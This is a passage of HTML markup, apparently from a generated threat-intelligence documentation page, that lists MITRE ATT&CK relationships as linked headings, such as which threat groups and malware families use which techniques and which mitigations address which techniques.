<h3 id="_helminth_s0170_uses_scripting_t1064"><a class="anchor" href="#_helminth_s0170_uses_scripting_t1064"></a><a class="link" href="#_helminth_s0170_uses_scripting_t1064">Helminth (S0170) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_multi_stage_channels_mitigation_t1104_mitigates_multi_stage_channels_t1104"><a class="anchor" href="#_multi_stage_channels_mitigation_t1104_mitigates_multi_stage_channels_t1104"></a><a class="link" href="#_multi_stage_channels_mitigation_t1104_mitigates_multi_stage_channels_t1104">Multi-Stage Channels Mitigation (T1104) mitigates Multi-Stage Channels (T1104)</a></h3>
</div>
<div class="sect2">
<h3 id="_ixeshe_s0015_uses_data_obfuscation_t1001"><a class="anchor" href="#_ixeshe_s0015_uses_data_obfuscation_t1001"></a><a class="link" href="#_ixeshe_s0015_uses_data_obfuscation_t1001">Ixeshe (S0015) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_ntfs_extended_attributes_mitigation_t1096_mitigates_ntfs_extended_attributes_t1096"><a class="anchor" href="#_ntfs_extended_attributes_mitigation_t1096_mitigates_ntfs_extended_attributes_t1096"></a><a class="link" href="#_ntfs_extended_attributes_mitigation_t1096_mitigates_ntfs_extended_attributes_t1096">NTFS Extended Attributes Mitigation (T1096) mitigates NTFS Extended Attributes (T1096)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_data_from_removable_media_t1025"><a class="anchor" href="#_usbstealer_s0136_uses_data_from_removable_media_t1025"></a><a class="link" href="#_usbstealer_s0136_uses_data_from_removable_media_t1025">USBStealer (S0136) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_apt3_g0022_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_apt3_g0022_uses_obfuscated_files_or_information_t1027">APT3 (G0022) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_application_window_discovery_t1010"><a class="anchor" href="#_powerduke_s0139_uses_application_window_discovery_t1010"></a><a class="link" href="#_powerduke_s0139_uses_application_window_discovery_t1010">PowerDuke (S0139) uses Application Window Discovery (T1010)</a></h3>
</div>
<div class="sect2">
<h3 id="_shotput_s0063_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_shotput_s0063_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_shotput_s0063_uses_file_and_directory_discovery_t1083">SHOTPUT (S0063) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_gh0st_s0032_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_gh0st_s0032_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_gh0st_s0032_uses_indicator_removal_on_host_t1070">gh0st (S0032) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_new_service_t1050"><a class="anchor" href="#_elise_s0081_uses_new_service_t1050"></a><a class="link" href="#_elise_s0081_uses_new_service_t1050">Elise (S0081) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_nidiran_s0118_uses_new_service_t1050"><a class="anchor" href="#_nidiran_s0118_uses_new_service_t1050"></a><a class="link" href="#_nidiran_s0118_uses_new_service_t1050">Nidiran (S0118) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_input_capture_mitigation_t1056_mitigates_input_capture_t1056"><a class="anchor" href="#_input_capture_mitigation_t1056_mitigates_input_capture_t1056"></a><a class="link" href="#_input_capture_mitigation_t1056_mitigates_input_capture_t1056">Input Capture Mitigation (T1056) mitigates Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_net_s0039_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_net_s0039_uses_system_network_connections_discovery_t1049">Net (S0039) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_autoit_backdoor_s0129_uses_data_encoding_t1132"><a class="anchor" href="#_autoit_backdoor_s0129_uses_data_encoding_t1132"></a><a class="link" href="#_autoit_backdoor_s0129_uses_data_encoding_t1132">AutoIt backdoor (S0129) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_new_service_t1050"><a class="anchor" href="#_moonwind_s0149_uses_new_service_t1050"></a><a class="link" href="#_moonwind_s0149_uses_new_service_t1050">MoonWind (S0149) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_psexec_s0029"><a class="anchor" href="#_apt29_g0016_uses_psexec_s0029"></a><a class="link" href="#_apt29_g0016_uses_psexec_s0029">APT29 (G0016) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_shamoon_s0140_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_shamoon_s0140_uses_bypass_user_account_control_t1088">Shamoon (S0140) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_connection_proxy_t1090"><a class="anchor" href="#_duqu_s0038_uses_connection_proxy_t1090"></a><a class="link" href="#_duqu_s0038_uses_connection_proxy_t1090">Duqu (S0038) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_apt32_g0050_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_apt32_g0050_uses_exploitation_of_vulnerability_t1068">APT32 (G0050) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_shipshape_s0028_uses_shortcut_modification_t1023"><a class="anchor" href="#_shipshape_s0028_uses_shortcut_modification_t1023"></a><a class="link" href="#_shipshape_s0028_uses_shortcut_modification_t1023">SHIPSHAPE (S0028) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_dylib_hijacking_mitigation_t1157_mitigates_dylib_hijacking_t1157"><a class="anchor" href="#_dylib_hijacking_mitigation_t1157_mitigates_dylib_hijacking_t1157"></a><a class="link" href="#_dylib_hijacking_mitigation_t1157_mitigates_dylib_hijacking_t1157">Dylib Hijacking Mitigation (T1157) mitigates Dylib Hijacking (T1157)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_remote_file_copy_t1105"><a class="anchor" href="#_emissary_s0082_uses_remote_file_copy_t1105"></a><a class="link" href="#_emissary_s0082_uses_remote_file_copy_t1105">Emissary (S0082) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_timestomp_t1099"><a class="anchor" href="#_misdat_s0083_uses_timestomp_t1099"></a><a class="link" href="#_misdat_s0083_uses_timestomp_t1099">Misdat (S0083) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_system_information_discovery_t1082"><a class="anchor" href="#_mis_type_s0084_uses_system_information_discovery_t1082"></a><a class="link" href="#_mis_type_s0084_uses_system_information_discovery_t1082">Mis-Type (S0084) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_rundll32_t1085"><a class="anchor" href="#_cozycar_s0046_uses_rundll32_t1085"></a><a class="link" href="#_cozycar_s0046_uses_rundll32_t1085">CozyCar (S0046) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_data_staged_t1074"><a class="anchor" href="#_usbstealer_s0136_uses_data_staged_t1074"></a><a class="link" href="#_usbstealer_s0136_uses_data_staged_t1074">USBStealer (S0136) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_winnti_s0141_uses_masquerading_t1036"><a class="anchor" href="#_winnti_s0141_uses_masquerading_t1036"></a><a class="link" href="#_winnti_s0141_uses_masquerading_t1036">Winnti (S0141) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_system_owner_user_discovery_mitigation_t1033_mitigates_system_owner_user_discovery_t1033"><a class="anchor" href="#_system_owner_user_discovery_mitigation_t1033_mitigates_system_owner_user_discovery_t1033"></a><a class="link" href="#_system_owner_user_discovery_mitigation_t1033_mitigates_system_owner_user_discovery_t1033">System Owner/User Discovery Mitigation (T1033) mitigates System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_httpclient_s0068"><a class="anchor" href="#_putter_panda_g0024_uses_httpclient_s0068"></a><a class="link" href="#_putter_panda_g0024_uses_httpclient_s0068">Putter Panda (G0024) uses httpclient (S0068)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_masquerading_t1036"><a class="anchor" href="#_apt32_g0050_uses_masquerading_t1036"></a><a class="link" href="#_apt32_g0050_uses_masquerading_t1036">APT32 (G0050) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_software_packing_t1045"><a class="anchor" href="#_apt29_g0016_uses_software_packing_t1045"></a><a class="link" href="#_apt29_g0016_uses_software_packing_t1045">APT29 (G0016) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_taidoor_s0011_uses_process_injection_t1055"><a class="anchor" href="#_taidoor_s0011_uses_process_injection_t1055"></a><a class="link" href="#_taidoor_s0011_uses_process_injection_t1055">Taidoor (S0011) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_rc_common_mitigation_t1163_mitigates_rc_common_t1163"><a class="anchor" href="#_rc_common_mitigation_t1163_mitigates_rc_common_t1163"></a><a class="link" href="#_rc_common_mitigation_t1163_mitigates_rc_common_t1163">Rc.common Mitigation (T1163) mitigates Rc.common (T1163)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_screen_capture_t1113"><a class="anchor" href="#_xagentosx_s0161_uses_screen_capture_t1113"></a><a class="link" href="#_xagentosx_s0161_uses_screen_capture_t1113">XAgentOSX (S0161) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_fallchill_s0181_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_fallchill_s0181_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_fallchill_s0181_uses_system_network_configuration_discovery_t1016">FALLCHILL (S0181) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_net_s0039"><a class="anchor" href="#_ke3chang_g0004_uses_net_s0039"></a><a class="link" href="#_ke3chang_g0004_uses_net_s0039">Ke3chang (G0004) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_access_token_manipulation_mitigation_t1134_mitigates_access_token_manipulation_t1134"><a class="anchor" href="#_access_token_manipulation_mitigation_t1134_mitigates_access_token_manipulation_t1134"></a><a class="link" href="#_access_token_manipulation_mitigation_t1134_mitigates_access_token_manipulation_t1134">Access Token Manipulation Mitigation (T1134) mitigates Access Token Manipulation (T1134)</a></h3>
</div>
<div class="sect2">
<h3 id="_shotput_s0063_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_shotput_s0063_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_shotput_s0063_uses_obfuscated_files_or_information_t1027">SHOTPUT (S0063) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_cosmicduke_s0050_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_cosmicduke_s0050_uses_exploitation_of_vulnerability_t1068">CosmicDuke (S0050) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_poshspy_s0150_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_poshspy_s0150_uses_obfuscated_files_or_information_t1027">POSHSPY (S0150) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_emissary_s0082_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_emissary_s0082_uses_registry_run_keys_start_folder_t1060">Emissary (S0082) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_process_discovery_t1057"><a class="anchor" href="#_mobileorder_s0079_uses_process_discovery_t1057"></a><a class="link" href="#_mobileorder_s0079_uses_process_discovery_t1057">MobileOrder (S0079) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_carbanak_s0030"><a class="anchor" href="#_carbanak_g0008_uses_carbanak_s0030"></a><a class="link" href="#_carbanak_g0008_uses_carbanak_s0030">Carbanak (G0008) uses Carbanak (S0030)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_httpbrowser_s0070_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_httpbrowser_s0070_uses_file_and_directory_discovery_t1083">HTTPBrowser (S0070) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_soundbite_s0157_uses_system_information_discovery_t1082"><a class="anchor" href="#_soundbite_s0157_uses_system_information_discovery_t1082"></a><a class="link" href="#_soundbite_s0157_uses_system_information_discovery_t1082">SOUNDBITE (S0157) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_onionduke_s0052_uses_web_service_t1102"><a class="anchor" href="#_onionduke_s0052_uses_web_service_t1102"></a><a class="link" href="#_onionduke_s0052_uses_web_service_t1102">OnionDuke (S0052) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_man_in_the_browser_t1185"><a class="anchor" href="#_cobalt_strike_s0154_uses_man_in_the_browser_t1185"></a><a class="link" href="#_cobalt_strike_s0154_uses_man_in_the_browser_t1185">Cobalt Strike (S0154) uses Man in the Browser (T1185)</a></h3>
</div>
<div class="sect2">
<h3 id="_winnti_group_g0044_uses_process_discovery_t1057"><a class="anchor" href="#_winnti_group_g0044_uses_process_discovery_t1057"></a><a class="link" href="#_winnti_group_g0044_uses_process_discovery_t1057">Winnti Group (G0044) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_encoding_mitigation_t1132_mitigates_data_encoding_t1132"><a class="anchor" href="#_data_encoding_mitigation_t1132_mitigates_data_encoding_t1132"></a><a class="link" href="#_data_encoding_mitigation_t1132_mitigates_data_encoding_t1132">Data Encoding Mitigation (T1132) mitigates Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_fakem_s0076_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_fakem_s0076_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_fakem_s0076_uses_standard_application_layer_protocol_t1071">FakeM (S0076) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_net_s0039"><a class="anchor" href="#_bronze_butler_g0060_uses_net_s0039"></a><a class="link" href="#_bronze_butler_g0060_uses_net_s0039">BRONZE BUTLER (G0060) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_pngdowner_s0067_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_pngdowner_s0067_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_pngdowner_s0067_uses_standard_application_layer_protocol_t1071">pngdowner (S0067) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_rundll32_t1085"><a class="anchor" href="#_advstoreshell_s0045_uses_rundll32_t1085"></a><a class="link" href="#_advstoreshell_s0045_uses_rundll32_t1085">ADVSTORESHELL (S0045) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_process_discovery_t1057"><a class="anchor" href="#_cobalt_strike_s0154_uses_process_discovery_t1057"></a><a class="link" href="#_cobalt_strike_s0154_uses_process_discovery_t1057">Cobalt Strike (S0154) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_isminjector_s0189"><a class="anchor" href="#_oilrig_g0049_uses_isminjector_s0189"></a><a class="link" href="#_oilrig_g0049_uses_isminjector_s0189">OilRig (G0049) uses ISMInjector (S0189)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_mobileorder_s0079_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_mobileorder_s0079_uses_standard_cryptographic_protocol_t1032">MobileOrder (S0079) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_apt34_g0057_uses_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_apt34_g0057_uses_deobfuscate_decode_files_or_information_t1140">APT34 (G0057) uses Deobfuscate/Decode Files or Information (T1140)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_file_system_permissions_weakness_t1044"><a class="anchor" href="#_blackenergy_s0089_uses_file_system_permissions_weakness_t1044"></a><a class="link" href="#_blackenergy_s0089_uses_file_system_permissions_weakness_t1044">BlackEnergy (S0089) uses File System Permissions Weakness (T1044)</a></h3>
</div>
<div class="sect2">
<h3 id="_onionduke_s0052_uses_credential_dumping_t1003"><a class="anchor" href="#_onionduke_s0052_uses_credential_dumping_t1003"></a><a class="link" href="#_onionduke_s0052_uses_credential_dumping_t1003">OnionDuke (S0052) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_tor_s0183_uses_multi_hop_proxy_t1188"><a class="anchor" href="#_tor_s0183_uses_multi_hop_proxy_t1188"></a><a class="link" href="#_tor_s0183_uses_multi_hop_proxy_t1188">Tor (S0183) uses Multi-hop Proxy (T1188)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_data_from_removable_media_t1025"><a class="anchor" href="#_crimson_s0115_uses_data_from_removable_media_t1025"></a><a class="link" href="#_crimson_s0115_uses_data_from_removable_media_t1025">Crimson (S0115) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_sys10_s0060_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_sys10_s0060_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_sys10_s0060_uses_system_network_configuration_discovery_t1016">Sys10 (S0060) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_account_discovery_t1087"><a class="anchor" href="#_osinfo_s0165_uses_account_discovery_t1087"></a><a class="link" href="#_osinfo_s0165_uses_account_discovery_t1087">OSInfo (S0165) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_osinfo_s0165_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_osinfo_s0165_uses_system_network_connections_discovery_t1049">OSInfo (S0165) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_jhuhugit_s0044_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_jhuhugit_s0044_uses_registry_run_keys_start_folder_t1060">JHUHUGIT (S0044) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_admin_338_g0018_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_admin_338_g0018_uses_system_network_connections_discovery_t1049">admin@338 (G0018) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_windshield_s0155_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_windshield_s0155_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_windshield_s0155_uses_system_owner_user_discovery_t1033">WINDSHIELD (S0155) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_powershell_t1086"><a class="anchor" href="#_seaduke_s0053_uses_powershell_t1086"></a><a class="link" href="#_seaduke_s0053_uses_powershell_t1086">SeaDuke (S0053) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_mitigation_t1047_mitigates_windows_management_instrumentation_t1047"><a class="anchor" href="#_windows_management_instrumentation_mitigation_t1047_mitigates_windows_management_instrumentation_t1047"></a><a class="link" href="#_windows_management_instrumentation_mitigation_t1047_mitigates_windows_management_instrumentation_t1047">Windows Management Instrumentation Mitigation (T1047) mitigates Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_network_service_scanning_t1046"><a class="anchor" href="#_cobalt_strike_s0154_uses_network_service_scanning_t1046"></a><a class="link" href="#_cobalt_strike_s0154_uses_network_service_scanning_t1046">Cobalt Strike (S0154) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_redundant_access_t1108"><a class="anchor" href="#_oilrig_g0049_uses_redundant_access_t1108"></a><a class="link" href="#_oilrig_g0049_uses_redundant_access_t1108">OilRig (G0049) uses Redundant Access (T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_scripting_t1064"><a class="anchor" href="#_oilrig_g0049_uses_scripting_t1064"></a><a class="link" href="#_oilrig_g0049_uses_scripting_t1064">OilRig (G0049) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_wingbird_s0176_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_wingbird_s0176_uses_exploitation_of_vulnerability_t1068">Wingbird (S0176) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_file_deletion_t1107"><a class="anchor" href="#_derusbi_s0021_uses_file_deletion_t1107"></a><a class="link" href="#_derusbi_s0021_uses_file_deletion_t1107">Derusbi (S0021) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_data_staged_t1074"><a class="anchor" href="#_apt28_g0007_uses_data_staged_t1074"></a><a class="link" href="#_apt28_g0007_uses_data_staged_t1074">APT28 (G0007) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_flipside_s0173"><a class="anchor" href="#_fin5_g0053_uses_flipside_s0173"></a><a class="link" href="#_fin5_g0053_uses_flipside_s0173">FIN5 (G0053) uses FLIPSIDE (S0173)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_file_deletion_t1107"><a class="anchor" href="#_seaduke_s0053_uses_file_deletion_t1107"></a><a class="link" href="#_seaduke_s0053_uses_file_deletion_t1107">SeaDuke (S0053) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_apt34_g0057_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_apt34_g0057_uses_standard_application_layer_protocol_t1071">APT34 (G0057) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_halfbaked_s0151_uses_screen_capture_t1113"><a class="anchor" href="#_halfbaked_s0151_uses_screen_capture_t1113"></a><a class="link" href="#_halfbaked_s0151_uses_screen_capture_t1113">HALFBAKED (S0151) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_data_encrypted_t1022"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_data_encrypted_t1022"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_data_encrypted_t1022">Backdoor.Oldrea (S0093) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_powershell_t1086"><a class="anchor" href="#_threat_group_3390_g0027_uses_powershell_t1086"></a><a class="link" href="#_threat_group_3390_g0027_uses_powershell_t1086">Threat Group-3390 (G0027) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_system_information_discovery_t1082"><a class="anchor" href="#_crimson_s0115_uses_system_information_discovery_t1082"></a><a class="link" href="#_crimson_s0115_uses_system_information_discovery_t1082">Crimson (S0115) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_system_information_discovery_t1082"><a class="anchor" href="#_mobileorder_s0079_uses_system_information_discovery_t1082"></a><a class="link" href="#_mobileorder_s0079_uses_system_information_discovery_t1082">MobileOrder (S0079) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_credential_dumping_t1003"><a class="anchor" href="#_dragonfly_g0035_uses_credential_dumping_t1003"></a><a class="link" href="#_dragonfly_g0035_uses_credential_dumping_t1003">Dragonfly (G0035) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_lazarus_group_g0032_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_lazarus_group_g0032_uses_system_network_configuration_discovery_t1016">Lazarus Group (G0032) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_network_sniffing_t1040"><a class="anchor" href="#_apt28_g0007_uses_network_sniffing_t1040"></a><a class="link" href="#_apt28_g0007_uses_network_sniffing_t1040">APT28 (G0007) uses Network Sniffing (T1040)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_magic_hound_g0059_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_magic_hound_g0059_uses_system_owner_user_discovery_t1033">Magic Hound (G0059) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_security_software_discovery_t1063"><a class="anchor" href="#_chopstick_s0023_uses_security_software_discovery_t1063"></a><a class="link" href="#_chopstick_s0023_uses_security_software_discovery_t1063">CHOPSTICK (S0023) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_remote_file_copy_t1105"><a class="anchor" href="#_powerduke_s0139_uses_remote_file_copy_t1105"></a><a class="link" href="#_powerduke_s0139_uses_remote_file_copy_t1105">PowerDuke (S0139) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_cobalt_strike_s0154_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_cobalt_strike_s0154_uses_custom_command_and_control_protocol_t1094">Cobalt Strike (S0154) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_process_discovery_t1057"><a class="anchor" href="#_blackenergy_s0089_uses_process_discovery_t1057"></a><a class="link" href="#_blackenergy_s0089_uses_process_discovery_t1057">BlackEnergy (S0089) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_rawpos_s0169"><a class="anchor" href="#_fin5_g0053_uses_rawpos_s0169"></a><a class="link" href="#_fin5_g0053_uses_rawpos_s0169">FIN5 (G0053) uses RawPOS (S0169)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_scheduled_task_t1053"><a class="anchor" href="#_apt3_g0022_uses_scheduled_task_t1053"></a><a class="link" href="#_apt3_g0022_uses_scheduled_task_t1053">APT3 (G0022) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_gsecdump_s0008"><a class="anchor" href="#_bronze_butler_g0060_uses_gsecdump_s0008"></a><a class="link" href="#_bronze_butler_g0060_uses_gsecdump_s0008">BRONZE BUTLER (G0060) uses gsecdump (S0008)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_remsec_s0125_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_remsec_s0125_uses_system_owner_user_discovery_t1033">Remsec (S0125) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_net_s0039"><a class="anchor" href="#_apt1_g0006_uses_net_s0039"></a><a class="link" href="#_apt1_g0006_uses_net_s0039">APT1 (G0006) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_lazarus_group_g0032_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_lazarus_group_g0032_uses_custom_cryptographic_protocol_t1024">Lazarus Group (G0032) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_systeminfo_s0096"><a class="anchor" href="#_apt34_g0057_uses_systeminfo_s0096"></a><a class="link" href="#_apt34_g0057_uses_systeminfo_s0096">APT34 (G0057) uses Systeminfo (S0096)</a></h3>
</div>
<div class="sect2">
